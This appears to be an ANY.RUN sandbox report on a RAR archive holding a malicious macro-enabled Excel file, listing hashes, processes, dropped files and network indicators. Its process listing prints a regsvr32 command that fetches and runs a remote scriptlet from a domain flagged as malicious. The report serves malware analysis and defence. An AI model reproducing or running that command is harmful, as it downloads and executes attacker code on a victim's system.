analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

C:\Users\admin\AppData\Local\Temp\test.rar

Full analysis: https://app.any.run/tasks/6b0bfd36-28ec-4ecd-96a5-c62b3afecb0a
Verdict: Malicious activity
Analysis date: July 17, 2019, 13:04:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

E31D4EA311027C3A9886C91F86CA28F5

SHA1:

446F0E9109F3380F639B89D714DEBED9AE48253F

SHA256:

007043E4B319ED65F3A332BB1543E556562B2E7CA14EA706D41284EE0D5C873C

SSDEEP:

768:U7W2u0rCxdt5MSxUl/NDgLoB0WDnKWNPh7cb9EEy/cZl4:/wWF5MSal/N7OW7Ph7cuEy/a4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Runs remote scriptlet

      • EXCEL.EXE (PID: 3336)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3336)
  • SUSPICIOUS

    No suspicious indicators.
  • INFO

    • Manual execution by user

      • EXCEL.EXE (PID: 3336)
    • Creates files in the user directory

      • EXCEL.EXE (PID: 3336)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3336)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs excel.exe regsvr32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3860"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\test.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3336"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
2180regsvr32 /s /n /u /i:https://cdn-4imprint.ddns.net:443/adServingData/PROD/TMClient/6/8736/_rg scrobj.dllC:\Windows\system32\regsvr32.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft(C) Register Server
Exit code:
5
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
17 293
Read events
7 550
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
9
Text files
3
Unknown types
1

Dropped files

PID
Process
Filename
Type
3860WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3860.20382\test.xlsm
MD5:
SHA256:
3336EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR2F0A.tmp.cvr
MD5:
SHA256:
3336EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\test.xlsm.LNK
MD5:
SHA256:
3336EXCEL.EXEC:\Users\admin\Desktop\DE7F0000
MD5:
SHA256:
3336EXCEL.EXEC:\Users\admin\Desktop\818F0000
MD5:
SHA256:
3336EXCEL.EXEC:\Users\admin\Desktop\488F0000
MD5:
SHA256:
3336EXCEL.EXEC:\Users\admin\Desktop\20401000
MD5:
SHA256:
3336EXCEL.EXEC:\Users\admin\Desktop\test.xlsmdocument
MD5:BDA3A96BC2406C8787A377FAF011C762
SHA256:555CC99D55E2ED84E258D76839F38E7A832FD7A91509A814B013A47B895BB497
3336EXCEL.EXEC:\Users\admin\Desktop\E0DAD2F7.tmpdocument
MD5:BDA3A96BC2406C8787A377FAF011C762
SHA256:555CC99D55E2ED84E258D76839F38E7A832FD7A91509A814B013A47B895BB497
3336EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\ONetConfig\786b7d3a5372048de949b5ce333fe46e.xmlxml
MD5:285E57B09335CE92D35A74CC2AB7744C
SHA256:D657101FF597561DBF21FC95457C999DEED1CED12A7AE041B36033CFDF22D7B1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3336
EXCEL.EXE
GET
200
52.109.88.8:80
http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={538F6C89-2AD5-4006-8154-C6670774E980}&build=14.0.6023
NL
xml
1.99 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3336
EXCEL.EXE
52.109.120.28:443
rr.office.microsoft.com
Microsoft Corporation
HK
whitelisted
3336
EXCEL.EXE
52.109.88.8:80
office14client.microsoft.com
Microsoft Corporation
NL
whitelisted

DNS requests

Domain
IP
Reputation
cdn-4imprint.ddns.net
malicious
office14client.microsoft.com
  • 52.109.88.8
whitelisted
rr.office.microsoft.com
  • 52.109.120.28
whitelisted

Threats

No threats detected
No debug info